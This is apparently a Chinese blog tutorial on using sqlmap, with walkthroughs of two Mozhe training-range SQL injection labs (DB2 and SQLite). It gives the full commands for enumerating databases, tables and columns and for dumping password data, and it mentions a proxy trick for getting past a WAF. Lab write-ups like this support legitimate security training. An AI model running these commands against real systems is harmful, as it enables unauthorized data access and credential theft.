WEB攻防-通用漏洞&SQL注入-sqlmap基本使用&墨者靶场

目录

知识点

SQLMAP

-什么是SQLMAP?

-它支持那些数据库注入?

-它支持那些SQL注入模式?

-它支持那些其他不一样功能?

-使用SQLMAP一般注入流程分析?

SQL注入类型:

案例演示

SQL注入-墨者-SQL手工注入漏洞测试(Db2数据库)

 SQL注入-墨者-SQL手工注入漏洞测试(SQLite数据库)

其他注入方法介绍

sqlmap -r


知识点

1、数据库注入-Oracle&Mongodb

2、数据库注入-DB2&SQLite&Sybase

3、SQL注入神器-SQLMAP安装使用拓展

SQLMAP

-什么是SQLMAP?

sqlmap是一个开源渗透测试工具,可以自动检测和利用sql注入漏洞并接管数据服务器。总体来说只要配备sql的漏洞都可以使用sqlmap。

-它支持那些数据库注入?

不支持nosql数据库

-它支持那些SQL注入模式?

基于布尔的盲注、基于时间的盲注、基于错误的、基于union查询、堆叠查询和带外

-它支持那些其他不一样功能?

代理注入:在注入的时候,代理可以让我们随时看到sqlmap的进度。当地址被waf拉入黑名单可以使用代理绕过waf。

-使用SQLMAP一般注入流程分析?

判断注入点-判断数据库-判断高低权限(access不区分高低权限)-通过权限的不同使用不同的方法

SQL注入类型:

1.数据库注入 - access mysql mssql oracle mongodb postgresql等

2.数据类型注入 - 数字型 字符型 搜索型 加密型(base64 json)等

3.提交方式注入 - get post cookie http头等

4.查询方式注入 - 查询 增加 删除 更新 堆叠等

5.复杂注入利用 - 二次注入 dnslog注入 绕过bypass等

案例演示

SQL注入-墨者-SQL手工注入漏洞测试(Db2数据库)

启动靶机

WEB攻防-通用漏洞&SQL注入-sqlmap基本使用&墨者靶场_第1张图片

发现注入点

sqlmap语句: python.exe sqlmap.py -u "http://124.70.71.251:49539/new_list.php?id=1"

代码解释:利用python去调用sqlmap下的.py文件,-u代表指定的路径

 接下来会告诉我们已经猜测是IBM DB2数据库,是否跳过其他数据库的检测。对于其测试的要包含的扩展级别。全部直接y就好。

 当看到的是以下的这个界面,那么就可以证明是存在注入点的,并且在末尾告诉了数据库的类型

WEB攻防-通用漏洞&SQL注入-sqlmap基本使用&墨者靶场_第2张图片

 查询权限

sqlmap语句:python.exe sqlmap.py -u "http://124.70.71.251:49539/new_list.php?id=1" --is-dba 或者 python.exe sqlmap.py -u "http://124.70.71.251:49539/new_list.php?id=1" --privileges

代码解释:--is-dba代表查看权限        --privileges代表是否是数据库管理员

查看显示的数据为True,那么证明是管理员用户

sqlmap 数据库注入数据猜解

sqlmap语句:python.exe sqlmap.py -u "http://124.70.71.251:49539/new_list.php?id=1" --dbs

代码解释:--dbs代表获取数据库

通过显示数据可以发现一共有13个数据库

 WEB攻防-通用漏洞&SQL注入-sqlmap基本使用&墨者靶场_第3张图片

获取数据库

sqlmap语句:\python.exe sqlmap.py -u "http://124.70.71.251:49539/new_list.php?id=1" --current-db

代码解释:--current-db是获取当前数据库

现在知道了数据库名为DB2INST1

获取表名

sqlmap语句:python.exe sqlmap.py -u "http://124.70.71.251:49539/new_list.php?id=1" --tables -D "DB2INST1"

代码解释:--tables代表获取表名 -D代表指定某个数据库    如果不加-D将获取所有数据库的表名

目前知道了 数据库名DB2INST1  表名 GAME_CHARACTER   NOTICE

WEB攻防-通用漏洞&SQL注入-sqlmap基本使用&墨者靶场_第4张图片 

获取列名

sqlmap语句:python.exe sqlmap.py -u "http://124.70.71.251:49539/new_list.php?id=1" --columns -T "NOTICE" -D "DB2INST1"

代码解释:--columns代表获取列名  -T代表指定表名

目前已知信息为:数据库名DB2INST1  表名 GAME_CHARACTER   NOTICE 

WEB攻防-通用漏洞&SQL注入-sqlmap基本使用&墨者靶场_第5张图片 

获取信息

sqlmap语句:python.exe sqlmap.py -u "http://124.70.71.251:49539/new_list.php?id=1" --dump -C "name" -T "GAME_CHARACTER" -D "DB2INST1"  和  python.exe sqlmap.py -u "http://124.70.71.251:49539/new_list.php?id=1" --dump -C "password" -T "GAME_CHARACTER" -D "DB2INST1"

代码解释:--dump代表获取内容        -C代表获取指定内容

这里小编因为知道账号密码在哪个表中直接获取,在实战中时代价需要一个个表测试。

WEB攻防-通用漏洞&SQL注入-sqlmap基本使用&墨者靶场_第6张图片  

 WEB攻防-通用漏洞&SQL注入-sqlmap基本使用&墨者靶场_第7张图片 

这里给各位简单说一下,下面的路径是每次测试完,数据自动存放的路径。可以打开直接查看

WEB攻防-通用漏洞&SQL注入-sqlmap基本使用&墨者靶场_第8张图片

 SQL注入-墨者-SQL手工注入漏洞测试(SQLite数据库)

启动靶机---本次实验与上面实验代码相似,所以不在提供代码

WEB攻防-通用漏洞&SQL注入-sqlmap基本使用&墨者靶场_第9张图片

发现注入点,这里使用了--purge,代表清除上一个缓存。获取了数据库名为SQLite,也可以知道是Linux Ubuntu系统,中间件为Nginx

判断是否为管理员,返回为true,代表是管理员

 

查询所有数据库,返回值user only ‘--tables’代表只有表没有数据库

查询表,得知了表名为WSTMart_reg  notice_sybase  sqlite_sequence

 WEB攻防-通用漏洞&SQL注入-sqlmap基本使用&墨者靶场_第10张图片

获取列名,因为小编知道账号密码在WSTMart_reg下,真实环境中需要不断猜测尝试

WEB攻防-通用漏洞&SQL注入-sqlmap基本使用&墨者靶场_第11张图片 

 获取账号密码,存在一些小细节,在图片中给各位解释了一下

WEB攻防-通用漏洞&SQL注入-sqlmap基本使用&墨者靶场_第12张图片 WEB攻防-通用漏洞&SQL注入-sqlmap基本使用&墨者靶场_第13张图片

 

其他注入方法介绍

sqlmap -r

sqlmap -r 指定文件

-r代表跑指定文件,在文件需要注入的地方添加*号即可

使用场景:利用sqlmap去跑某个特性的数据包。比如注入点产生在用户登陆后的地方,那么就需要把登陆后的数据包进行保存并利用sqlmap去跑,这样sqlmap才知道需要去对登陆后的页面进行注入,否则直接利用网址sqlmap也不会知道需要登陆就无法找到注入点。

WEB攻防-通用漏洞&SQL注入-sqlmap基本使用&墨者靶场_第14张图片

 

 

 

 

 

你可能感兴趣的:(sql,数据库)